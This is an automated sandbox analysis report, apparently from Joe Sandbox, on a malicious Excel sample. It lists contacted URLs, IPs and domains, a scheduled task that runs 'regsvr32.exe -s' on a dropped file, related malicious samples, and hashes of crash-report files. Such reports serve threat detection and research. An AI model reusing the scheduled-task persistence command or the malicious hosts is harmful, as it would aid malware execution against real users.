https://www.odwebp.svc.ms	9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://api.powerbi.com/v1.0/myorg/groups	9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	false		high
https://web.microsoftstream.com/video/	9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	false		high
https://graph.windows.net	9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	false		high
https://dataservice.o365filtering.com/	9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://officesetup.getmicrosoftkey.com	9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://analysis.windows.net/powerbi/api	9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	false		high
https://prod-global-autodetect.acompli.net/autodetect	9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://outlook.office365.com/autodiscover/autodiscover.json	9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	false		high
https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios	9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	false		high
https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech	9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	false		high
https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json	9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	false		high
https://ncus.contentsync.	9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false	9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	false		high
https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/	9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	false		high
http://weather.service.msn.com/data.aspx	9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	false		high
https://apis.live.net/v5.0/	9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks	9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	false		high
https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios	9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	false		high
https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml	9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	false		high
https://management.azure.com	9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	false		high
https://wus2.contentsync.	9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://incidents.diagnostics.office.com	9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	false		high
https://clients.config.office.net/user/v1.0/ios	9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	false		high
https://insertmedia.bing.office.net/odc/insertmedia	9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	false		high
https://o365auditrealtimeingestion.manage.office.com	9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	false		high
https://outlook.office365.com/api/v1.0/me/Activities	9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	false		high
https://api.office.net	9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	false		high
https://incidents.diagnosticssdf.office.com	9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	false		high
https://asgsmsproxyapi.azurewebsites.net/	9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	false	Avira URL Cloud: safe	unknown
https://clients.config.office.net/user/v1.0/android/policies	9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	false		high
https://entitlement.diagnostics.office.com	9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	false		high
https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json	9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	false		high
https://outlook.office.com/	9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	false		high
https://storage.live.com/clientlogs/uploadlocation	9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	false		high
https://templatelogging.office.com/client/log	9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	false		high
https://outlook.office365.com/	9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	false		high
https://webshell.suite.office.com	9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	false		high
https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive	9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	false		high
https://management.azure.com/	9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	false		high
https://login.windows.net/common/oauth2/authorize	9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	false		high
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile	9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://graph.windows.net/	9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	false		high
https://api.powerbi.com/beta/myorg/imports	9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	false		high
https://devnull.onenote.com	9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	false		high
https://ncus.pagecontentsync.	9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json	9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	false		high
https://messaging.office.com/	9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	false		high
https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile	9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	false		high
https://augloop.office.com/v2	9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	false		high
https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing	9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	false		high
https://skyapi.live.net/Activity/	9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://clients.config.office.net/user/v1.0/mac	9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	false		high
https://dataservice.o365filtering.com	9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://api.cortana.ai	9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://onedrive.live.com	9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	false		high
https://ovisualuiapp.azurewebsites.net/pbiagave/	9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	false	Avira URL Cloud: safe	unknown
https://visio.uservoice.com/forums/368202-visio-on-devices	9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	false		high
https://directory.services.	9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://login.windows-ppe.net/common/oauth2/authorize	9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	false		high
https://staging.cortana.ai	9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
192.185.39.58	signifysystem.com	United States		46606	UNIFIEDLAYER-AS-1US	false
192.185.32.232	fcventasyservicios.cl	United States		46606	UNIFIEDLAYER-AS-1US	false

General Information

Joe Sandbox Version:	32.0.0 Black Diamond
Analysis ID:	412182
Start date:	12.05.2021
Start time:	13:29:29
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 8m 47s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	9659e9a8_by_Libranalysis.xls
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Run name:	Potential for more IOCs and behavior
Number of analysed new started processes analysed:	33
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.expl.evad.winXLS@18/18@2/2
EGA Information:	Failed
HDC Information:	Successful, ratio: 85.1% (good quality ratio 79.7%) Quality average: 81.4% Quality standard deviation: 28.5%
HCA Information:	Successful, ratio: 100% Number of executed functions: 69 Number of non-executed functions: 69
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .xls Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Scroll down Close Viewer
Warnings:	Show All Report size exceeded maximum capacity and may have missing behavior information.

Simulations

Behavior and APIs

Time	Type	Description
13:32:54	Task Scheduler	Run new task: frjwqvc path: regsvr32.exe s>-s "C:\Users\user\ritofm.cvm"

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
192.185.39.58	46747509_by_Libranalysis.xls	Get hash	malicious	Browse
192.185.39.58	46747509_by_Libranalysis.xls	Get hash	malicious	Browse
192.185.32.232	46747509_by_Libranalysis.xls	Get hash	malicious	Browse
192.185.32.232	46747509_by_Libranalysis.xls	Get hash	malicious	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
signifysystem.com	46747509_by_Libranalysis.xls	Get hash	malicious	Browse	192.185.39.58
signifysystem.com	46747509_by_Libranalysis.xls	Get hash	malicious	Browse	192.185.39.58
fcventasyservicios.cl	46747509_by_Libranalysis.xls	Get hash	malicious	Browse	192.185.32.232
fcventasyservicios.cl	46747509_by_Libranalysis.xls	Get hash	malicious	Browse	192.185.32.232

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
UNIFIEDLAYER-AS-1US	46747509_by_Libranalysis.xls	Get hash	malicious	Browse	192.185.32.232
	46747509_by_Libranalysis.xls	Get hash	malicious	Browse	192.185.32.232
	457b22da_by_Libranalysis.exe	Get hash	malicious	Browse	192.232.222.43
	abc8a77f_by_Libranalysis.xlsx	Get hash	malicious	Browse	67.20.76.71
	Revised Invoice pdf.exe	Get hash	malicious	Browse	192.185.171.219
	DINTEC HCU24021ED.exe	Get hash	malicious	Browse	162.241.169.22
	dd9097e7_by_Libranalysis.exe	Get hash	malicious	Browse	192.185.171.219
	RFQ.exe	Get hash	malicious	Browse	192.185.129.32
	Order 122001-220 guanzo.exe	Get hash	malicious	Browse	162.241.62.63
	in.exe	Get hash	malicious	Browse	162.241.244.112
	PO-002755809-NO#PRT101 Order pdf.exe	Get hash	malicious	Browse	162.144.13.239
	catalog-1908475637.xls	Get hash	malicious	Browse	108.167.180.164
	catalog-1908475637.xls	Get hash	malicious	Browse	108.167.180.164
	export of purchase order 7484876.xlsm	Get hash	malicious	Browse	108.179.232.90
	XM7eDjwHqp.xlsm	Get hash	malicious	Browse	162.241.190.216
	QTFsui5pLN.xlsm	Get hash	malicious	Browse	108.179.232.90
	15j1TCnOiA.xlsm	Get hash	malicious	Browse	192.185.115.105
	e8eRhf3GM0.xlsm	Get hash	malicious	Browse	162.241.190.216
	SOA PDF.exe	Get hash	malicious	Browse	192.185.226.148
	djBLaxEojp.exe	Get hash	malicious	Browse	192.185.161.67
UNIFIEDLAYER-AS-1US	46747509_by_Libranalysis.xls	Get hash	malicious	Browse	192.185.32.232
	46747509_by_Libranalysis.xls	Get hash	malicious	Browse	192.185.32.232
	457b22da_by_Libranalysis.exe	Get hash	malicious	Browse	192.232.222.43
	abc8a77f_by_Libranalysis.xlsx	Get hash	malicious	Browse	67.20.76.71
	Revised Invoice pdf.exe	Get hash	malicious	Browse	192.185.171.219
	DINTEC HCU24021ED.exe	Get hash	malicious	Browse	162.241.169.22
	dd9097e7_by_Libranalysis.exe	Get hash	malicious	Browse	192.185.171.219
	RFQ.exe	Get hash	malicious	Browse	192.185.129.32
	Order 122001-220 guanzo.exe	Get hash	malicious	Browse	162.241.62.63
	in.exe	Get hash	malicious	Browse	162.241.244.112
	PO-002755809-NO#PRT101 Order pdf.exe	Get hash	malicious	Browse	162.144.13.239
	catalog-1908475637.xls	Get hash	malicious	Browse	108.167.180.164
	catalog-1908475637.xls	Get hash	malicious	Browse	108.167.180.164
	export of purchase order 7484876.xlsm	Get hash	malicious	Browse	108.179.232.90
	XM7eDjwHqp.xlsm	Get hash	malicious	Browse	162.241.190.216
	QTFsui5pLN.xlsm	Get hash	malicious	Browse	108.179.232.90
	15j1TCnOiA.xlsm	Get hash	malicious	Browse	192.185.115.105
	e8eRhf3GM0.xlsm	Get hash	malicious	Browse	162.241.190.216
	SOA PDF.exe	Get hash	malicious	Browse	192.185.226.148
	djBLaxEojp.exe	Get hash	malicious	Browse	192.185.161.67

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
37f463bf4616ecd445d4a1937da06e19	46747509_by_Libranalysis.xls	Get hash	malicious	Browse	192.185.32.232 192.185.39.58
	LMNF434.vbs	Get hash	malicious	Browse	192.185.32.232 192.185.39.58
	SF65G55121E0FE25552.vbs	Get hash	malicious	Browse	192.185.32.232 192.185.39.58
	catalog-1908475637.xls	Get hash	malicious	Browse	192.185.32.232 192.185.39.58
	rF27d1O1O2.exe	Get hash	malicious	Browse	192.185.32.232 192.185.39.58
	cSvu8bTzJU.exe	Get hash	malicious	Browse	192.185.32.232 192.185.39.58
	Contract_kyrgyzstan_pdf.exe	Get hash	malicious	Browse	192.185.32.232 192.185.39.58
	551f47ac_by_Libranalysis.xlsm	Get hash	malicious	Browse	192.185.32.232 192.185.39.58
	DHL_988121.exe	Get hash	malicious	Browse	192.185.32.232 192.185.39.58
	DHL_988121.exe	Get hash	malicious	Browse	192.185.32.232 192.185.39.58
	SMC PO 1083 SAJ 1946 .exe	Get hash	malicious	Browse	192.185.32.232 192.185.39.58
	catalog-949138716.xls	Get hash	malicious	Browse	192.185.32.232 192.185.39.58
	- FAX ID 74172012198198.htm	Get hash	malicious	Browse	192.185.32.232 192.185.39.58
	#Ud83d#Udd7b Missed Playback Recording.wav - 1424592794.htm	Get hash	malicious	Browse	192.185.32.232 192.185.39.58
	Cotizacii#U00f3n.exe	Get hash	malicious	Browse	192.185.32.232 192.185.39.58
	Cotizaci#U00f3n.exe	Get hash	malicious	Browse	192.185.32.232 192.185.39.58
	statistic-1310760242.xlsm	Get hash	malicious	Browse	192.185.32.232 192.185.39.58
	Payment Slip.docx	Get hash	malicious	Browse	192.185.32.232 192.185.39.58
	Report000042.htm	Get hash	malicious	Browse	192.185.32.232 192.185.39.58
	NewPO.exe	Get hash	malicious	Browse	192.185.32.232 192.185.39.58

Dropped Files

No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_regsvr32.exe_68e15ffc7f9f5ac199eaf956335a58761f4230_7a325c51_0f165c5f\Report.wer Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	11464
Entropy (8bit):	3.774649044476038
Encrypted:	false
SSDEEP:	192:czcHHb6V6RiH/RS5uGXx3RjetB/u7svS274ItUz:ucH76VS6/RS5n3jez/u7svX4ItUz
MD5:	39C8BF52118F2DF4E1400A3D41DE5A51
SHA1:	E62C4BC8AF8B8FCE9E049E142A203B9C4199E3BB
SHA-256:	B515576750DBB9CFE3CC594AEEE3644FE7D1FB8C0BFCC8C11C7B0A592EF0A9C5
SHA-512:	699D4D43B3C0522510575F4426C6C6E664E657FAB82505CC9661A8F90B537B5741AC9D5057FE30B14F8CE3D33646C1A959E46196B4778575AC87165164188812
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.6.5.2.9.2.7.8.0.2.9.3.9.3.0.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.e.b.d.7.c.5.d.-.3.d.c.5.-.4.8.7.c.-.9.4.c.f.-.8.5.f.7.e.7.1.6.9.8.2.6.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.8.f.e.4.b.7.5.-.9.2.7.8.-.4.9.4.5.-.8.3.a.7.-.e.7.0.0.a.3.6.2.a.6.2.4.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.e.g.s.v.r.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.E.G.S.V.R.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.4.0.c.-.0.0.0.0.-.0.0.1.b.-.b.f.1.7.-.2.8.8.d.2.2.4.7.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.8.8.6.3.0.f.6.0.e.7.3.4.5.4.6.7.0.a.7.d.9.b.6.4.c.9.8.b.4.7.9.8.d.1.d.e.8.8.7.2.!.r.e.g.s.v.r.3.2...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.1.9.7.1././.0.4././.0.9.:.1.7.:.2.8.:.2.3.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_regsvr32.exe_68e15ffc7f9f5ac199eaf956335a58761f4230_7a325c51_169b688f\Report.wer Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	11468
Entropy (8bit):	3.7748207749167326
Encrypted:	false
SSDEEP:	192:65zctb6VrRiH/RS5uGXx3RjetB/u7s+S274ItUA:6tcZ6Vl6/RS5n3jez/u7s+X4ItUA
MD5:	5847C220BB3FCE86D70761833080B730
SHA1:	A4163C896D0E0757CCD535BAEBC12A2B86997D0D
SHA-256:	D119B196266808913C896B2907FDFA19DD0B6BC191AEE69869A28F61CDB3346A
SHA-512:	C29C5FE40E0C9135D04057D9D6EA232F05BDCD5A38C1D149EB4E74DF305127B0C70E73B2F5FA143A51F7C770C7D7BB2E1653A0A537F894F54F15A7FD3E9F9119
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.6.5.2.9.2.8.4.8.0.4.3.6.8.8.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.6.c.6.0.f.b.6.-.f.2.9.a.-.4.0.a.a.-.a.a.9.e.-.7.8.0.c.9.c.9.6.e.7.9.1.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.b.f.4.0.a.5.4.-.a.a.c.f.-.4.c.b.d.-.b.d.1.6.-.3.0.b.4.0.6.2.7.d.5.f.0.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.e.g.s.v.r.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.E.G.S.V.R.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.2.a.c.-.0.0.0.0.-.0.0.1.b.-.1.8.5.9.-.6.d.b.4.2.2.4.7.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.8.8.6.3.0.f.6.0.e.7.3.4.5.4.6.7.0.a.7.d.9.b.6.4.c.9.8.b.4.7.9.8.d.1.d.e.8.8.7.2.!.r.e.g.s.v.r.3.2...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.1.9.7.1././.0.4././.0.9.:.1.7.:.2.8.:.2.3.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER4CBF.tmp.dmp Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Wed May 12 11:33:02 2021, 0x1205a4 type
Category:	dropped
Size (bytes):	35442
Entropy (8bit):	2.5239486387082346
Encrypted:	false
SSDEEP:	192:W4JnLfisbC1OUVml8P2tWD7ReNW+N8HLOglhLMEZmcv8hn39:pfisbkAAD7UHGJhLMdci39
MD5:	DC850D1425AC809E1ACD975F4BAB694C
SHA1:	B04B235D0D07FDC2E44307B53D9080695B62B3D7
SHA-256:	BC6A8571B9AF3ECAEA069A8857280EC7BBB549A0ABF843E347EA048048BD98B3
SHA-512:	F6BE9D6FD0B2422411A895BBFF14A1A32710D2FAA86C0B4FCB2C255B008964BA1D4397240ACB942F8F95CD87E131707D6D0ABE93B2A8FB7F27564FC30789EF41
Malicious:	false
Preview:	MDMP....... ........`...................U...........B..............GenuineIntelW...........T............`.............................@..1...............W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .D.a.y.l.i.g.h.t. .T.i.m.e.......................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER54FD.tmp.WERInternalMetadata.xml Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	8250
Entropy (8bit):	3.692711693602928
Encrypted:	false
SSDEEP:	192:Rrl7r3GLNiiY6t6YEvSUlEgmfJdpSN+pBB89bHAsfrtm:RrlsNi96t6YESUmgmfJdpSlHTfM
MD5:	D163A65497BA8EB6406341C11EE4B63D
SHA1:	1FA2D678B7948135F4C862A33F4E3D92C92804D2
SHA-256:	6F698E4440A6FBFB5847F7FD12D5311C6F379307F5B4313D492F9208DA172FB2
SHA-512:	DCE1EE06BD8C5BEAD0865CB4F08E2684E23BC1AD8C574A058D32165FDAD54AE821F5F6262780D57F695CBC24666C9666CF6F92033130EEC17D1EEC6AB3798EC1
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.1.3.2.<./.P.i.d.>.......

C:\ProgramData\Microsoft\Windows\WER\Temp\WER5565.tmp.dmp Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Wed May 12 11:34:10 2021, 0x1205a4 type
Category:	dropped
Size (bytes):	42306
Entropy (8bit):	2.3453773527449613
Encrypted:	false
SSDEEP:	192:lA5m/ZivMeOugvCm+CFPutUdCvQKkmXMsWOwP2f19fkELxMCnsG:lLQyx5sUgvQ4lA292EbsG
MD5:	7398A2F851BD34E393B519BF1E875277
SHA1:	5115EAD153C056703D6FC041D332D856FF3CAB2B
SHA-256:	CCC5B089CBE993673B437B9CEE5BE4E4BCF8999F74F84A77ECE9EC01813517A5
SHA-512:	D98FF340312BD064002C9C54F5ACE140647411D0A72825D17B9D0D3DA8A54B4B281C3BB9CFF6633DFE13EB3C7D44DF58C4467B7EF368DA24830C05F3672BCE6E
Malicious:	false
Preview:	MDMP....... .......2..`...................U...........B..............GenuineIntelW...........T...........)..`.............................@..1...............W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .D.a.y.l.i.g.h.t. .T.i.m.e.......................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER58B7.tmp.xml Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4621
Entropy (8bit):	4.449817238256939
Encrypted:	false
SSDEEP:	48:cvIwSD8zsyJgtWI9fvWSC8Bm8fm8M4JkMGEF8wy+q8sSdMKJYbgd:uITfAk+SNVJYNqYbgd
MD5:	A0F1A7247BFAC0C9B73858DC79665D7E
SHA1:	19301FF2E82290A794A2469DEB078EC2C4FF2AAD
SHA-256:	A8B9192922BEC62DEF51699075A59623E048621259670145027438E468A2D755
SHA-512:	BC3B7755771F262EADA33BAB6A9589568752ABAC59B5D6FD5EB1929E7DEEEB9931CC08E57A6FFF1DB3D05E750732261E63652B7400D4AE5074C6DFAD13ADA39A
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="986203" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

C:\ProgramData\Microsoft\Windows\WER\Temp\WER611E.tmp.WERInternalMetadata.xml Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	8258
Entropy (8bit):	3.690894055322852
Encrypted:	false
SSDEEP:	192:Rrl7r3GLNic+6IOEUe6YqMSURgmfJdpSN+pBB89bKesfh9mOm:RrlsNi16IOW6YRSURgmfJdpSlKdfh9m
MD5:	9AEBAB314B2BD9AF417BC87D58172805
SHA1:	5B4DE827B9E4EB11B844A1C938674B4C3DCBDF7D
SHA-256:	BAF40699EC1503DC290CDCBC12CBC16E79BF643F16901820BD3391A0B62FDBC6
